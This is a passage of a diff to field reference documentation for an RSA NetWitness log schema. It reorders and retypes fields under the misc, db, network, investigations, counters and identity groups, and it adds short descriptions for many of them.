name and username in a windows log. - type: keyword -- -*`rsa.misc.virusname`*:: +*`rsa.misc.cs_registrant`*:: + -- -This key captures the name of the virus - type: keyword -- -*`rsa.misc.content_type`*:: +*`rsa.misc.cs_registrar`*:: + -- -This key is used to capture Content Type only. - type: keyword -- -*`rsa.misc.group_id`*:: +*`rsa.misc.cs_represult`*:: + -- -This key captures Group ID Number (related to the group name) - type: keyword -- -*`rsa.misc.policy_id`*:: +*`rsa.misc.cs_rpayload`*:: + -- -This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise - type: keyword -- -*`rsa.misc.vsys`*:: +*`rsa.misc.cs_sampler_name`*:: + -- -This key captures Virtual System Name - type: keyword -- -*`rsa.misc.connection_id`*:: +*`rsa.misc.cs_sourcemodule`*:: + -- -This key captures the Connection ID - type: keyword -- -*`rsa.misc.reference_id2`*:: +*`rsa.misc.cs_streams`*:: + -- -This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. - type: keyword -- -*`rsa.misc.sensor`*:: +*`rsa.misc.cs_targetmodule`*:: + -- -This key captures Name of the sensor. Typically used in IDS/IPS based devices - type: keyword -- -*`rsa.misc.sig_id`*:: +*`rsa.misc.cs_v6nxthop`*:: + -- -This key captures IDS/IPS Int Signature ID - -type: long +type: keyword -- -*`rsa.misc.port_name`*:: +*`rsa.misc.cs_whois_server`*:: + -- -This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). - type: keyword -- -*`rsa.misc.rule_group`*:: +*`rsa.misc.cs_yararesult`*:: + -- -This key captures the Rule group name - type: keyword -- -*`rsa.misc.risk_num`*:: +*`rsa.misc.description`*:: + -- -This key captures a Numeric Risk value - -type: double +type: keyword -- -*`rsa.misc.trigger_val`*:: +*`rsa.misc.devvendor`*:: + -- -This key captures the Value of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.log_session_id1`*:: +*`rsa.misc.distance`*:: + -- -This key is used to capture a Linked (Related) Session ID from the session directly - type: keyword -- -*`rsa.misc.comp_version`*:: +*`rsa.misc.dstburb`*:: + -- -This key captures the Version level of a sub-component of a product. - type: keyword -- -*`rsa.misc.content_version`*:: +*`rsa.misc.edomain`*:: + -- -This key captures Version level of a signature or database content. - type: keyword -- -*`rsa.misc.hardware_id`*:: +*`rsa.misc.edomaub`*:: + -- -This key is used to capture unique identifier for a device or system (NOT a Mac address) - type: keyword -- -*`rsa.misc.risk`*:: +*`rsa.misc.euid`*:: + -- -This key captures the non-numeric risk value - type: keyword -- -*`rsa.misc.event_id`*:: +*`rsa.misc.facility`*:: + -- type: keyword -- -*`rsa.misc.reason`*:: +*`rsa.misc.finterface`*:: + -- type: keyword -- -*`rsa.misc.status`*:: +*`rsa.misc.flags`*:: + -- type: keyword -- -*`rsa.misc.mail_id`*:: +*`rsa.misc.gaddr`*:: + -- -This key is used to capture the mailbox id/name - type: keyword -- -*`rsa.misc.rule_uid`*:: +*`rsa.misc.id3`*:: + -- -This key is the Unique Identifier for a rule. - type: keyword -- -*`rsa.misc.trigger_desc`*:: +*`rsa.misc.im_buddyname`*:: + -- -This key captures the Description of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.inout`*:: +*`rsa.misc.im_croomid`*:: + -- type: keyword -- -*`rsa.misc.p_msgid`*:: +*`rsa.misc.im_croomtype`*:: + -- type: keyword -- -*`rsa.misc.data_type`*:: +*`rsa.misc.im_members`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart4`*:: +*`rsa.misc.im_username`*:: + -- type: keyword -- -*`rsa.misc.error`*:: +*`rsa.misc.ipkt`*:: + -- -This key captures All non successful Error codes or responses - type: keyword -- -*`rsa.misc.index`*:: +*`rsa.misc.ipscat`*:: + -- type: keyword -- -*`rsa.misc.listnum`*:: +*`rsa.misc.ipspri`*:: + -- -This key is used to capture listname or listnumber, primarily for collecting access-list - type: keyword -- -*`rsa.misc.ntype`*:: +*`rsa.misc.latitude`*:: + -- type: keyword -- -*`rsa.misc.observed_val`*:: +*`rsa.misc.linenum`*:: + -- -This key captures the Value observed (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.policy_value`*:: +*`rsa.misc.list_name`*:: + -- -This key captures the contents of the policy. This contains details about the policy - type: keyword -- -*`rsa.misc.pool_name`*:: +*`rsa.misc.load_data`*:: + -- -This key captures the name of a resource pool - type: keyword -- -*`rsa.misc.rule_template`*:: +*`rsa.misc.location_floor`*:: + -- -A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template - type: keyword -- -*`rsa.misc.count`*:: +*`rsa.misc.location_mark`*:: + -- type: keyword -- -*`rsa.misc.number`*:: +*`rsa.misc.log_id`*:: + -- type: keyword -- -*`rsa.misc.sigcat`*:: +*`rsa.misc.log_type`*:: + -- type: keyword -- -*`rsa.misc.type`*:: +*`rsa.misc.logid`*:: + -- type: keyword -- -*`rsa.misc.comments`*:: +*`rsa.misc.logip`*:: + -- -Comment information provided in the log message - type: keyword -- -*`rsa.misc.doc_number`*:: +*`rsa.misc.logname`*:: + -- -This key captures File Identification number - -type: long +type: keyword -- -*`rsa.misc.expected_val`*:: +*`rsa.misc.longitude`*:: + -- -This key captures the Value expected (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.job_num`*:: +*`rsa.misc.lport`*:: + -- -This key captures the Job Number - type: keyword -- -*`rsa.misc.spi_dst`*:: +*`rsa.misc.mbug_data`*:: + -- -Destination SPI Index - type: keyword -- -*`rsa.misc.spi_src`*:: +*`rsa.misc.misc_name`*:: + -- -Source SPI Index - type: keyword -- -*`rsa.misc.code`*:: +*`rsa.misc.msg_type`*:: + -- type: keyword -- -*`rsa.misc.agent_id`*:: +*`rsa.misc.msgid`*:: + -- -This key is used to capture agent id +type: keyword + +-- +*`rsa.misc.netsessid`*:: ++ +-- type: keyword -- -*`rsa.misc.message_body`*:: +*`rsa.misc.num`*:: + -- -This key captures the The contents of the message body. - type: keyword -- -*`rsa.misc.phone`*:: +*`rsa.misc.number1`*:: + -- type: keyword -- -*`rsa.misc.sig_id_str`*:: +*`rsa.misc.number2`*:: + -- -This key captures a string object of the sigid variable. - type: keyword -- -*`rsa.misc.cmd`*:: +*`rsa.misc.nwwn`*:: + -- type: keyword -- -*`rsa.misc.misc`*:: +*`rsa.misc.object`*:: + -- type: keyword -- -*`rsa.misc.name`*:: +*`rsa.misc.operation`*:: + -- type: keyword -- -*`rsa.misc.cpu`*:: +*`rsa.misc.opkt`*:: + -- -This key is the CPU time used in the execution of the event being recorded. - -type: long +type: keyword -- -*`rsa.misc.event_desc`*:: +*`rsa.misc.orig_from`*:: + -- -This key is used to capture a description of an event available directly or inferred - type: keyword -- -*`rsa.misc.sig_id1`*:: +*`rsa.misc.owner_id`*:: + -- -This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id - -type: long +type: keyword -- -*`rsa.misc.im_buddyid`*:: +*`rsa.misc.p_action`*:: + -- type: keyword -- -*`rsa.misc.im_client`*:: +*`rsa.misc.p_filter`*:: + -- type: keyword -- -*`rsa.misc.im_userid`*:: +*`rsa.misc.p_group_object`*:: + -- type: keyword -- -*`rsa.misc.pid`*:: +*`rsa.misc.p_id`*:: + -- type: keyword -- -*`rsa.misc.priority`*:: +*`rsa.misc.p_msgid1`*:: + -- type: keyword -- -*`rsa.misc.context_subject`*:: +*`rsa.misc.p_msgid2`*:: + -- -This key is to be used in an audit context where the subject is the object being identified - type: keyword -- -*`rsa.misc.context_target`*:: +*`rsa.misc.p_result1`*:: + -- type: keyword -- -*`rsa.misc.cve`*:: +*`rsa.misc.password_chg`*:: + -- -This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. - type: keyword -- -*`rsa.misc.fcatnum`*:: +*`rsa.misc.password_expire`*:: + -- -This key captures Filter Category Number. Legacy Usage - type: keyword -- -*`rsa.misc.library`*:: +*`rsa.misc.permgranted`*:: + -- -This key is used to capture library information in mainframe devices - type: keyword -- -*`rsa.misc.parent_node`*:: +*`rsa.misc.permwanted`*:: + -- -This key captures the Parent Node Name. Must be related to node variable. - type: keyword -- -*`rsa.misc.risk_info`*:: +*`rsa.misc.pgid`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.tcp_flags`*:: +*`rsa.misc.policyUUID`*:: + -- -This key is captures the TCP flags set in any packet of session - -type: long +type: keyword -- -*`rsa.misc.tos`*:: +*`rsa.misc.prog_asp_num`*:: + -- -This key describes the type of service - -type: long +type: keyword -- -*`rsa.misc.vm_target`*:: +*`rsa.misc.program`*:: + -- -VMWare Target **VMWARE** only varaible. - type: keyword -- -*`rsa.misc.workspace`*:: +*`rsa.misc.real_data`*:: + -- -This key captures Workspace Description - type: keyword -- -*`rsa.misc.command`*:: +*`rsa.misc.rec_asp_device`*:: + -- type: keyword -- -*`rsa.misc.event_category`*:: +*`rsa.misc.rec_asp_num`*:: + -- type: keyword -- -*`rsa.misc.facilityname`*:: +*`rsa.misc.rec_library`*:: + -- type: keyword -- -*`rsa.misc.forensic_info`*:: +*`rsa.misc.recordnum`*:: + -- type: keyword -- -*`rsa.misc.jobname`*:: +*`rsa.misc.ruid`*:: + -- type: keyword -- -*`rsa.misc.mode`*:: +*`rsa.misc.sburb`*:: + -- type: keyword -- -*`rsa.misc.policy`*:: +*`rsa.misc.sdomain_fld`*:: + -- type: keyword -- -*`rsa.misc.policy_waiver`*:: +*`rsa.misc.sec`*:: + -- type: keyword -- -*`rsa.misc.second`*:: +*`rsa.misc.sensorname`*:: + -- type: keyword -- -*`rsa.misc.space1`*:: +*`rsa.misc.seqnum`*:: + -- type: keyword -- -*`rsa.misc.subcategory`*:: +*`rsa.misc.session`*:: + -- type: keyword -- -*`rsa.misc.tbdstr2`*:: +*`rsa.misc.sessiontype`*:: + -- type: keyword -- -*`rsa.misc.alert_id`*:: +*`rsa.misc.sigUUID`*:: + -- -Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.checksum_dst`*:: +*`rsa.misc.spi`*:: + -- -This key is used to capture the checksum or hash of the the target entity such as a process or file. - type: keyword -- -*`rsa.misc.checksum_src`*:: +*`rsa.misc.srcburb`*:: + -- -This key is used to capture the checksum or hash of the source entity such as a file or process. - type: keyword -- -*`rsa.misc.fresult`*:: +*`rsa.misc.srcdom`*:: + -- -This key captures the Filter Result - -type: long +type: keyword -- -*`rsa.misc.payload_dst`*:: +*`rsa.misc.srcservice`*:: + -- -This key is used to capture destination payload - type: keyword -- -*`rsa.misc.payload_src`*:: +*`rsa.misc.state`*:: + -- -This key is used to capture source payload - type: keyword -- -*`rsa.misc.pool_id`*:: +*`rsa.misc.status1`*:: + -- -This key captures the identifier (typically numeric field) of a resource pool - type: keyword -- -*`rsa.misc.process_id_val`*:: +*`rsa.misc.svcno`*:: + -- -This key is a failure key for Process ID when it is not an integer value - type: keyword -- -*`rsa.misc.risk_num_comm`*:: +*`rsa.misc.system`*:: + -- -This key captures Risk Number Community - -type: double +type: keyword -- -*`rsa.misc.risk_num_next`*:: +*`rsa.misc.tbdstr1`*:: + -- -This key captures Risk Number NextGen - -type: double +type: keyword -- -*`rsa.misc.risk_num_sand`*:: +*`rsa.misc.tgtdom`*:: + -- -This key captures Risk Number SandBox - -type: double +type: keyword -- -*`rsa.misc.risk_num_static`*:: +*`rsa.misc.tgtdomain`*:: + -- -This key captures Risk Number Static - -type: double +type: keyword -- -*`rsa.misc.risk_suspicious`*:: +*`rsa.misc.threshold`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.risk_warning`*:: +*`rsa.misc.type1`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.snmp_oid`*:: +*`rsa.misc.udb_class`*:: + -- -SNMP Object Identifier - type: keyword -- -*`rsa.misc.sql`*:: +*`rsa.misc.url_fld`*:: + -- -This key captures the SQL query - type: keyword -- -*`rsa.misc.vuln_ref`*:: +*`rsa.misc.user_div`*:: + -- -This key captures the Vulnerability Reference details - type: keyword -- -*`rsa.misc.acl_id`*:: +*`rsa.misc.userid`*:: + -- type: keyword -- -*`rsa.misc.acl_op`*:: +*`rsa.misc.username_fld`*:: + -- type: keyword -- -*`rsa.misc.acl_pos`*:: +*`rsa.misc.utcstamp`*:: + -- type: keyword -- -*`rsa.misc.acl_table`*:: +*`rsa.misc.v_instafname`*:: + -- type: keyword -- -*`rsa.misc.admin`*:: +*`rsa.misc.virt_data`*:: + -- type: keyword -- -*`rsa.misc.alarm_id`*:: +*`rsa.misc.vpnid`*:: + -- type: keyword -- -*`rsa.misc.alarmname`*:: +*`rsa.misc.autorun_type`*:: + -- +This is used to capture Auto Run type + type: keyword -- -*`rsa.misc.app_id`*:: +*`rsa.misc.cc_number`*:: + -- -type: keyword +Valid Credit Card Numbers only + +type: long -- -*`rsa.misc.audit`*:: +*`rsa.misc.content`*:: + -- +This key captures the content type from protocol headers + type: keyword -- -*`rsa.misc.audit_object`*:: +*`rsa.misc.ein_number`*:: + -- -type: keyword +Employee Identification Numbers only + +type: long -- -*`rsa.misc.auditdata`*:: +*`rsa.misc.found`*:: + -- +This is used to capture the results of regex match + type: keyword -- -*`rsa.misc.benchmark`*:: +*`rsa.misc.language`*:: + -- +This is used to capture list of languages the client support and what it prefers + type: keyword -- -*`rsa.misc.bypass`*:: +*`rsa.misc.lifetime`*:: + -- -type: keyword +This key is used to capture the session lifetime in seconds. + +type: long -- -*`rsa.misc.cache`*:: +*`rsa.misc.link`*:: + -- +This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.misc.cache_hit`*:: +*`rsa.misc.match`*:: + -- +This key is for regex match name from search.ini + type: keyword -- -*`rsa.misc.cefversion`*:: +*`rsa.misc.param_dst`*:: + -- +This key captures the command line/launch argument of the target process or file + type: keyword -- -*`rsa.misc.cfg_attr`*:: +*`rsa.misc.param_src`*:: + -- +This key captures source parameter + type: keyword -- -*`rsa.misc.cfg_obj`*:: +*`rsa.misc.search_text`*:: + -- +This key captures the Search Text used + type: keyword -- -*`rsa.misc.cfg_path`*:: +*`rsa.misc.sig_name`*:: + -- +This key is used to capture the Signature Name only. + type: keyword -- -*`rsa.misc.changes`*:: +*`rsa.misc.snmp_value`*:: + -- +SNMP set request value + type: keyword -- -*`rsa.misc.client_ip`*:: +*`rsa.misc.streams`*:: + -- -type: keyword +This key captures number of streams in session + +type: long -- -*`rsa.misc.clustermembers`*:: + +*`rsa.db.index`*:: + -- +This key captures IndexID of the index. + type: keyword -- -*`rsa.misc.cn_acttimeout`*:: +*`rsa.db.instance`*:: + -- +This key is used to capture the database server instance name + type: keyword -- -*`rsa.misc.cn_asn_src`*:: +*`rsa.db.database`*:: + -- +This key is used to capture the name of a database or an instance as seen in a session + type: keyword -- -*`rsa.misc.cn_bgpv4nxthop`*:: +*`rsa.db.transact_id`*:: + -- +This key captures the SQL transantion ID of the current session + type: keyword -- -*`rsa.misc.cn_ctr_dst_code`*:: +*`rsa.db.permissions`*:: + -- +This key captures permission or privilege level assigned to a resource. + type: keyword -- -*`rsa.misc.cn_dst_tos`*:: +*`rsa.db.table_name`*:: + -- +This key is used to capture the table name + type: keyword -- -*`rsa.misc.cn_dst_vlan`*:: +*`rsa.db.db_id`*:: + -- +This key is used to capture the unique identifier for a database + type: keyword -- -*`rsa.misc.cn_engine_id`*:: +*`rsa.db.db_pid`*:: + -- -type: keyword +This key captures the process id of a connection with database server + +type: long -- -*`rsa.misc.cn_engine_type`*:: +*`rsa.db.lread`*:: + -- -type: keyword +This key is used for the number of logical reads + +type: long -- -*`rsa.misc.cn_f_switch`*:: +*`rsa.db.lwrite`*:: + -- -type: keyword +This key is used for the number of logical writes + +type: long -- -*`rsa.misc.cn_flowsampid`*:: +*`rsa.db.pread`*:: + -- -type: keyword +This key is used for the number of physical writes + +type: long -- -*`rsa.misc.cn_flowsampintv`*:: + +*`rsa.network.alias_host`*:: + -- +This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. + type: keyword -- -*`rsa.misc.cn_flowsampmode`*:: +*`rsa.network.domain`*:: + -- type: keyword -- -*`rsa.misc.cn_inacttimeout`*:: +*`rsa.network.host_dst`*:: + -- +This key should only be used when it’s a Destination Hostname + type: keyword -- -*`rsa.misc.cn_inpermbyts`*:: +*`rsa.network.network_service`*:: + -- +This is used to capture layer 7 protocols/service names + type: keyword -- -*`rsa.misc.cn_inpermpckts`*:: +*`rsa.network.interface`*:: + -- +This key should be used when the source or destination context of an interface is not clear + type: keyword -- -*`rsa.misc.cn_invalid`*:: +*`rsa.network.network_port`*:: + -- -type: keyword +Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) + +type: long -- -*`rsa.misc.cn_ip_proto_ver`*:: +*`rsa.network.eth_host`*:: + -- +Deprecated, use alias.mac + type: keyword -- -*`rsa.misc.cn_ipv4_ident`*:: +*`rsa.network.sinterface`*:: + -- +This key should only be used when it’s a Source Interface + type: keyword -- -*`rsa.misc.cn_l_switch`*:: +*`rsa.network.dinterface`*:: + -- +This key should only be used when it’s a Destination Interface + type: keyword -- -*`rsa.misc.cn_log_did`*:: +*`rsa.network.vlan`*:: + -- -type: keyword +This key should only be used to capture the ID of the Virtual LAN + +type: long -- -*`rsa.misc.cn_log_rid`*:: +*`rsa.network.zone_src`*:: + -- +This key should only be used when it’s a Source Zone. + type: keyword -- -*`rsa.misc.cn_max_ttl`*:: +*`rsa.network.zone`*:: + -- +This key should be used when the source or destination context of a Zone is not clear + type: keyword -- -*`rsa.misc.cn_maxpcktlen`*:: +*`rsa.network.zone_dst`*:: + -- +This key should only be used when it’s a Destination Zone. + type: keyword -- -*`rsa.misc.cn_min_ttl`*:: +*`rsa.network.gateway`*:: + -- +This key is used to capture the IP Address of the gateway + type: keyword -- -*`rsa.misc.cn_minpcktlen`*:: +*`rsa.network.icmp_type`*:: + -- -type: keyword +This key is used to capture the ICMP type only + +type: long -- -*`rsa.misc.cn_mpls_lbl_1`*:: +*`rsa.network.mask`*:: + -- +This key is used to capture the device network IPmask. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_10`*:: +*`rsa.network.icmp_code`*:: + -- -type: keyword +This key is used to capture the ICMP code only + +type: long -- -*`rsa.misc.cn_mpls_lbl_2`*:: +*`rsa.network.protocol_detail`*:: + -- +This key should be used to capture additional protocol information + type: keyword -- -*`rsa.misc.cn_mpls_lbl_3`*:: +*`rsa.network.dmask`*:: + -- +This key is used for Destionation Device network mask + type: keyword -- -*`rsa.misc.cn_mpls_lbl_4`*:: +*`rsa.network.port`*:: + -- -type: keyword +This key should only be used to capture a Network Port when the directionality is not clear + +type: long -- -*`rsa.misc.cn_mpls_lbl_5`*:: +*`rsa.network.smask`*:: + -- +This key is used for capturing source Network Mask + type: keyword -- -*`rsa.misc.cn_mpls_lbl_6`*:: +*`rsa.network.netname`*:: + -- +This key is used to capture the network name associated with an IP range. This is configured by the end user. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_7`*:: +*`rsa.network.paddr`*:: + -- -type: keyword +Deprecated + +type: ip -- -*`rsa.misc.cn_mpls_lbl_8`*:: +*`rsa.network.faddr`*:: + -- type: keyword -- -*`rsa.misc.cn_mpls_lbl_9`*:: +*`rsa.network.lhost`*:: + -- type: keyword -- -*`rsa.misc.cn_mplstoplabel`*:: +*`rsa.network.origin`*:: + -- type: keyword -- -*`rsa.misc.cn_mplstoplabip`*:: +*`rsa.network.remote_domain_id`*:: + -- type: keyword -- -*`rsa.misc.cn_mul_dst_byt`*:: +*`rsa.network.addr`*:: + -- type: keyword -- -*`rsa.misc.cn_mul_dst_pks`*:: +*`rsa.network.dns_a_record`*:: + -- type: keyword -- -*`rsa.misc.cn_muligmptype`*:: +*`rsa.network.dns_ptr_record`*:: + -- type: keyword -- -*`rsa.misc.cn_sampalgo`*:: +*`rsa.network.fhost`*:: + -- type: keyword -- -*`rsa.misc.cn_sampint`*:: +*`rsa.network.fport`*:: + -- type: keyword -- -*`rsa.misc.cn_seqctr`*:: +*`rsa.network.laddr`*:: + -- type: keyword -- -*`rsa.misc.cn_spackets`*:: +*`rsa.network.linterface`*:: + -- type: keyword -- -*`rsa.misc.cn_src_tos`*:: +*`rsa.network.phost`*:: + -- type: keyword -- -*`rsa.misc.cn_src_vlan`*:: +*`rsa.network.ad_computer_dst`*:: + -- +Deprecated, use host.dst + type: keyword -- -*`rsa.misc.cn_sysuptime`*:: +*`rsa.network.eth_type`*:: + -- -type: keyword +This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only + +type: long -- -*`rsa.misc.cn_template_id`*:: +*`rsa.network.ip_proto`*:: + -- -type: keyword +This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI + +type: long -- -*`rsa.misc.cn_totbytsexp`*:: +*`rsa.network.dns_cname_record`*:: + -- type: keyword -- -*`rsa.misc.cn_totflowexp`*:: +*`rsa.network.dns_id`*:: + -- type: keyword -- -*`rsa.misc.cn_totpcktsexp`*:: +*`rsa.network.dns_opcode`*:: + -- type: keyword -- -*`rsa.misc.cn_unixnanosecs`*:: +*`rsa.network.dns_resp`*:: + -- type: keyword -- -*`rsa.misc.cn_v6flowlabel`*:: +*`rsa.network.dns_type`*:: + -- type: keyword -- -*`rsa.misc.cn_v6optheaders`*:: +*`rsa.network.domain1`*:: + -- type: keyword -- -*`rsa.misc.comp_class`*:: +*`rsa.network.host_type`*:: + -- type: keyword -- -*`rsa.misc.comp_name`*:: +*`rsa.network.packet_length`*:: + -- type: keyword -- -*`rsa.misc.comp_rbytes`*:: +*`rsa.network.host_orig`*:: + -- +This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. + type: keyword -- -*`rsa.misc.comp_sbytes`*:: +*`rsa.network.rpayload`*:: + -- +This key is used to capture the total number of payload bytes seen in the retransmitted packets. + type: keyword -- -*`rsa.misc.cpu_data`*:: +*`rsa.network.vlan_name`*:: + -- +This key should only be used to capture the name of the Virtual LAN + type: keyword -- -*`rsa.misc.criticality`*:: + +*`rsa.investigations.ec_activity`*:: + -- +This key captures the particular event activity(Ex:Logoff) + type: keyword -- -*`rsa.misc.cs_agency_dst`*:: +*`rsa.investigations.ec_theme`*:: + -- +This key captures the Theme of a particular Event(Ex:Authentication) + type: keyword -- -*`rsa.misc.cs_analyzedby`*:: +*`rsa.investigations.ec_subject`*:: + -- +This key captures the Subject of a particular Event(Ex:User) + type: keyword -- -*`rsa.misc.cs_av_other`*:: +*`rsa.investigations.ec_outcome`*:: + -- +This key captures the outcome of a particular Event(Ex:Success) + type: keyword -- -*`rsa.misc.cs_av_primary`*:: +*`rsa.investigations.event_cat`*:: + -- -type: keyword +This key captures the Event category number + +type: long -- -*`rsa.misc.cs_av_secondary`*:: +*`rsa.investigations.event_cat_name`*:: + -- +This key captures the event category name corresponding to the event cat code + type: keyword -- -*`rsa.misc.cs_bgpv6nxthop`*:: +*`rsa.investigations.event_vcat`*:: + -- +This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. + type: keyword -- -*`rsa.misc.cs_bit9status`*:: +*`rsa.investigations.analysis_file`*:: + -- +This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file + type: keyword -- -*`rsa.misc.cs_context`*:: +*`rsa.investigations.analysis_service`*:: + -- +This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service + type: keyword -- -*`rsa.misc.cs_control`*:: +*`rsa.investigations.analysis_session`*:: + -- +This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session + type: keyword -- -*`rsa.misc.cs_data`*:: +*`rsa.investigations.boc`*:: + -- +This is used to capture behaviour of compromise + type: keyword -- -*`rsa.misc.cs_datecret`*:: +*`rsa.investigations.eoc`*:: + -- +This is used to capture Enablers of Compromise + type: keyword -- -*`rsa.misc.cs_dst_tld`*:: +*`rsa.investigations.inv_category`*:: + -- +This used to capture investigation category + type: keyword -- -*`rsa.misc.cs_eth_dst_ven`*:: +*`rsa.investigations.inv_context`*:: + -- +This used to capture investigation context + type: keyword -- -*`rsa.misc.cs_eth_src_ven`*:: +*`rsa.investigations.ioc`*:: + -- +This is key capture indicator of compromise + type: keyword -- -*`rsa.misc.cs_event_uuid`*:: + +*`rsa.counters.dclass_c1`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c1.str only + +type: long -- -*`rsa.misc.cs_filetype`*:: +*`rsa.counters.dclass_c2`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c2.str only + +type: long -- -*`rsa.misc.cs_fld`*:: +*`rsa.counters.event_counter`*:: + -- -type: keyword +This is used to capture the number of times an event repeated + +type: long -- -*`rsa.misc.cs_if_desc`*:: +*`rsa.counters.dclass_r1`*:: + -- +This is a generic ratio key that should be used with the label dclass.r1.str only + type: keyword -- -*`rsa.misc.cs_if_name`*:: +*`rsa.counters.dclass_c3`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c3.str only + +type: long -- -*`rsa.misc.cs_ip_next_hop`*:: +*`rsa.counters.dclass_c1_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c1 only + type: keyword -- -*`rsa.misc.cs_ipv4dstpre`*:: +*`rsa.counters.dclass_c2_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c2 only + type: keyword -- -*`rsa.misc.cs_ipv4srcpre`*:: +*`rsa.counters.dclass_r1_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r1 only + type: keyword -- -*`rsa.misc.cs_lifetime`*:: +*`rsa.counters.dclass_r2`*:: + -- +This is a generic ratio key that should be used with the label dclass.r2.str only + type: keyword -- -*`rsa.misc.cs_log_medium`*:: +*`rsa.counters.dclass_c3_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c3 only + type: keyword -- -*`rsa.misc.cs_loginname`*:: +*`rsa.counters.dclass_r3`*:: + -- +This is a generic ratio key that should be used with the label dclass.r3.str only + type: keyword -- -*`rsa.misc.cs_modulescore`*:: +*`rsa.counters.dclass_r2_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r2 only + type: keyword -- -*`rsa.misc.cs_modulesign`*:: +*`rsa.counters.dclass_r3_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r3 only + type: keyword -- -*`rsa.misc.cs_opswatresult`*:: + +*`rsa.identity.auth_method`*:: + -- +This key is used to capture authentication methods used only + type: keyword -- -*`rsa.misc.cs_payload`*:: +*`rsa.identity.user_role`*:: + -- +This key is used to capture the Role of a user only + type: keyword -- -*`rsa.misc.cs_registrant`*:: +*`rsa.identity.dn`*:: + -- +X.500 (LDAP) Distinguished Name + type: keyword -- -*`rsa.misc.cs_registrar`*:: +*`rsa.identity.logon_type`*:: + -- +This key is used to capture the type of logon method used. + type: keyword -- -*`rsa.misc.cs_represult`*:: +*`rsa.identity.profile`*:: + -- +This key is used to capture the user profile + type: keyword -- -*`rsa.misc.cs_rpayload`*:: +*`rsa.identity.accesses`*:: + -- +This key is used to capture actual privileges used in accessing an object + type: keyword -- -*`rsa.misc.cs_sampler_name`*:: +*`rsa.identity.realm`*:: + -- +Radius realm or similar grouping of accounts + type: keyword -- -*`rsa.misc.cs_sourcemodule`*:: +*`rsa.identity.user_sid_dst`*:: + -- +This key captures Destination User Session ID + type: keyword -- -*`rsa.misc.cs_streams`*:: +*`rsa.identity.dn_src`*:: + -- +An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn + type: keyword -- -*`rsa.misc.cs_targetmodule`*:: +*`rsa.identity.org`*:: + -- +This key captures the User organization + type: keyword -- -*`rsa.misc.cs_v6nxthop`*:: +*`rsa.identity.dn_dst`*:: + -- +An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn + type: keyword -- -*`rsa.misc.cs_whois_server`*:: +*`rsa.identity.firstname`*:: + -- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.cs_yararesult`*:: +*`rsa.identity.lastname`*:: + -- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.description`*:: +*`rsa.identity.user_dept`*:: + -- +User's Department Names only + type: keyword -- -*`rsa.misc.devvendor`*:: +*`rsa.identity.user_sid_src`*:: + -- +This key captures Source User Session ID + type: keyword -- -*`rsa.misc.distance`*:: +*`rsa.identity.federated_sp`*:: + -- +This key is the Federated Service Provider. This is the application requesting authentication. + type: keyword -- -*`rsa.misc.dstburb`*:: +*`rsa.identity.federated_idp`*:: + -- +This key is the federated Identity Provider. This is the server providing the authentication. + type: keyword -- -*`rsa.misc.edomain`*:: +*`rsa.identity.logon_type_desc`*:: + -- +This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. + type: keyword -- -*`rsa.misc.edomaub`*:: +*`rsa.identity.middlename`*:: + -- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.euid`*:: +*`rsa.identity.password`*:: + -- +This key is for Passwords seen in any session, plain text or encrypted + type: keyword -- -*`rsa.misc.facility`*:: +*`rsa.identity.host_role`*:: + -- +This key should only be used to capture the role of a Host Machine + type: keyword -- -*`rsa.misc.finterface`*:: +*`rsa.identity.ldap`*:: + -- +This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context + type: keyword -- -*`rsa.misc.flags`*:: +*`rsa.identity.ldap_query`*:: + -- +This key is the Search criteria from an LDAP search + type: keyword -- -*`rsa.misc.gaddr`*:: 